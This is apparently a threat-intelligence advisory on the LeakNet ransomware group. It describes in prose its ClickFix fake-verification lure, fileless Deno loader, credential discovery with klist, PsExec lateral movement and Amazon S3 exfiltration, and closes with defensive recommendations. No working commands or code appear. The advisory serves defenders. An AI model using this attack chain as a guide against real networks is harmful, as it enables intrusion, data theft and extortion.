The LeakNet ransomware group has developed a more scalable and evasive attack methodology that leverages ClickFix social engineering techniques to trick users into executing malicious commands disguised as standard verification steps. This approach reduces reliance on traditional access techniques such as credential theft while enabling broader, lower-cost targeting of victims.
Once access is obtained, attackers deploy a covert, fileless payload that uses the Deno runtime to execute malicious code directly in memory, minimizing detection by traditional security tools. Subsequent stages include credential discovery, lateral movement across the network, data exfiltration through trusted cloud services, and eventual ransomware deployment. This evolution highlights a growing trend in which threat actors increasingly exploit legitimate tools and user behaviour to bypass conventional defences, emphasizing the need for improved user awareness and behaviour-based detection mechanisms.
The LeakNet ransomware attack chain begins with the delivery of ClickFix prompts through compromised legitimate websites. These prompts present users with fraudulent CAPTCHA or verification messages instructing them to execute a malicious msiexec.exe command. This method allows attackers to bypass traditional exploit-based entry points by relying on user interaction rather than software vulnerabilities. Executing the command launches a staged loader built on the Deno runtime environment, which runs Base64-encoded JavaScript payloads directly in memory. The loader fingerprints the compromised system and initiates command-and-control communication with attacker infrastructure through a continuous polling loop that retrieves additional payloads. Later stages of the attack involve the execution of malicious modules using DLL side-loading techniques, credential enumeration using built-in tools such as klist, and lateral movement across the environment through utilities such as PsExec. Data is staged and exfiltrated through cloud storage services, including Amazon S3, to blend with legitimate outbound traffic. The attack ultimately concludes with ransomware deployment and file encryption while maintaining a minimal forensic footprint due to limited disk artifacts and extensive use of living-off-the-land techniques. The details and technicalities of the attack campaign are discussed further
The LeakNet ransomware group primarily gains initial access through the ClickFix technique delivered via compromised legitimate websites. Victims encounter fake CAPTCHA or system error messages instructing them to copy and execute a malicious msiexec.exe command within the Windows Run dialog. This technique exploits user trust in common system prompts and bypasses many traditional network-based security detection mechanisms.
Additional delivery methods have also been observed, including phishing campaigns conducted through enterprise collaboration platforms such as Microsoft Teams, demonstrating the expansion of delivery vectors used by the group.
The Infection chain was identified as follows,
• Victims are lured through compromised websites displaying ClickFix prompts that trick users into executing a malicious msiexec.exe command, initiating the LeakNet ransomware attack chain.
• The command launches a staged fileless loader that uses the Deno runtime to execute Base64-encoded JavaScript directly in memory.
• The loader fingerprints the host system, establishes communication with a command-and-control server, and retrieves additional payloads through a continuous polling mechanism.
• Attackers deploy malicious modules through DLL side-loading, perform credential discovery using tools such as klist, and move laterally across the network using utilities including PsExec.
• Data is staged and exfiltrated to cloud storage services such as Amazon S3, followed by ransomware deployment that encrypts systems and enables double-extortion operations.
The LeakNet ransomware group demonstrates advanced technical capabilities through the use of fileless malware execution and living-off-the-land techniques. By leveraging the Deno runtime to execute Base64-encoded JavaScript payloads directly in memory, the attackers significantly reduce the presence of malicious artifacts on disk and evade traditional signature-based detection systems.
The attack framework enables system fingerprinting, dynamic payload delivery, and persistent command-and-control communication through polling mechanisms. Attackers frequently abuse legitimate system utilities such as msiexec.exe, cmd.exe, and credential enumeration tools including klist to blend malicious activity with normal system operations.
The group also employs modular post-exploitation techniques to maximize operational impact while maintaining stealth. DLL side-loading allows malicious modules to execute within trusted applications, while administrative tools such as PsExec facilitate lateral movement within the network. Data exfiltration through cloud services such as Amazon S3 enables attackers to disguise outbound traffic as normal business activity. This combination of in-memory execution, legitimate tool misuse, and cloud-based staging creates a flexible and highly evasive attack framework designed to prolong dwell time and ensure successful ransomware deployment.
LeakNet first emerged in late 2024 presenting itself as a self-proclaimed “digital watchdog,” but the group has since transitioned into a financially motivated ransomware operation. The group has strategically shifted away from relying on Initial Access Brokers and instead adopted self-sufficient access techniques such as ClickFix-based social engineering.
The adoption of Bring Your Own Runtime techniques, particularly through the use of the Deno runtime environment, demonstrates continued innovation in malware delivery and execution methods. These techniques allow threat actors to bypass traditional detection controls and may influence similar approaches among other ransomware operators.
LeakNet attacks are opportunistic and broadly distributed across global targets. The use of compromised websites as the primary delivery vector allows the group to reach victims worldwide without focusing on specific geographic regions or industries. Observed campaigns indicate that both enterprise and industrial environments are being targeted, with some activity linked to operational technology environments. Because infections depend heavily on user interaction rather than targeted infrastructure compromise, the campaign has the potential to affect organizations across multiple sectors and geographic regions.
LeakNet represents a notable evolution in ransomware operations by combining social engineering, fileless malware execution, and cloud-based data exfiltration into a scalable and repeatable attack framework. The group’s reliance on legitimate tools and user-driven execution challenges many traditional security defenses.
Organizations should prioritize behavioral detection mechanisms, proactive threat hunting capabilities, and enhanced user awareness training in order to detect and disrupt these attacks early in the intrusion lifecycle.
LeakNet attacks combine ransomware encryption with data exfiltration, enabling double-extortion strategies that significantly increase the severity of incidents. Organizations affected by these attacks may experience operational disruption, financial losses, reputational damage, and potential regulatory consequences resulting from data breaches.
The use of stealthy fileless techniques increases the overall risk by extending attacker dwell time and reducing the likelihood of early detection, allowing adversaries to conduct reconnaissance, credential theft, and data staging before ransomware deployment.
• Implement security awareness training programs that specifically address ClickFix-style social engineering techniques, including fake CAPTCHA prompts instructing users to execute system commands.
• Restrict and monitor the use of living-off-the-land binaries such as msiexec.exe, cmd.exe, and PsExec to detect potential misuse.
• Deploy Endpoint Detection and Response solutions capable of identifying in-memory execution, suspicious processes, and abnormal activity related to runtime environments such as Deno.
• Enforce application control policies and allowlisting to block unauthorized execution of scripts and binaries.
• Monitor network traffic for unusual outbound connections, particularly to cloud storage services such as Amazon S3 that may be used for data exfiltration.
• Restrict or tightly control remote administration tools, including PsExec, and ensure that all usage is logged and monitored.
• Strengthen identity and access management practices by enforcing least privilege and monitoring credential enumeration activities such as abnormal use of klist.
• Maintain secure and regularly tested backups to ensure rapid recovery in the event of ransomware deployment.
